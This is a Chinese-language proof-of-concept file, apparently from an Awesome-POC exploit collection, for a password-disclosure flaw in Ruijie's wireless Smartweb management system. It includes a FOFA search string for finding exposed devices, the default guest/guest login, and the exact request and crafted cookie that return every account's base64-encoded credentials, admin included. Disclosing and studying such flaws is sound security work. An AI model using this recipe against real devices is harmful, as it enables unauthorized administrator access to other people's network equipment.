Awesome-POC/network-device/锐捷 Smartweb管理系统 密码信息泄露漏洞.md
2022-02-20 16:14:31 +08:00

43 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 锐捷 Smartweb管理系统 密码信息泄露漏洞
## 漏洞描述
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞攻击者可从漏洞获取到管理员账号密码从而以管理员权限登录。
## 漏洞影响
```
锐捷网络股份有限公司 无线smartweb管理系统
```
## FOFA
```
title="无线smartWeb--登录页面"
```
## 漏洞复现
登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921639.png)
默认存在 guest账户账号密码为 **guest/guest**
其中登录的过程中搜索admin的数据后发现请求了一个文件 **/web/xml/webuser-auth.xml**,而且响应中包含了 admin密码的base64加密
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921386.png)
解密就可以获得 admin管理员的密码尝试直接请求
```plain
http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml
Cookie添加
Cookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110921729.png)
直接获得所有的账户的等级标志和base64加密的账号密码